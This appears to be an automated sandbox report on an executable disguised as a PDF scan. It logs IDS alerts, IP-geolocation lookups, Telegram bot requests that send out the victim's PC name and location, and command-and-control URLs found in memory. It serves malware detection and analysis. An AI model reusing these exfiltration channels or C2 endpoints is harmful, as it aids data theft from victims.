                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49722 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49710 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49727 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49719 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49714 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49713 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49738 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49749 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49736 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49728 -> 188.114.97.3:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49718 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2018:18:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:57:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 25 Oct 2024 07:17:26 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 25 Oct 2024 07:17:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3879338940.0000000000434000.00000040.00000400.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3879338940.0000000000434000.00000040.00000400.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, QeSBxb.exe.1.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, QeSBxb.exe.1.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, QeSBxb.exe.1.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1460284409.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1497081679.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: QeSBxb.exe, 0000000D.00000002.3883255353.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000334D000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.000000000300C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000324E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3879338940.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.81
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003208000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000324E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.81$
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, QeSBxb.exe.1.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: QeSBxb.exe, 0000000D.00000002.3883255353.0000000003042000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000003033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000337E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.000000000303D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
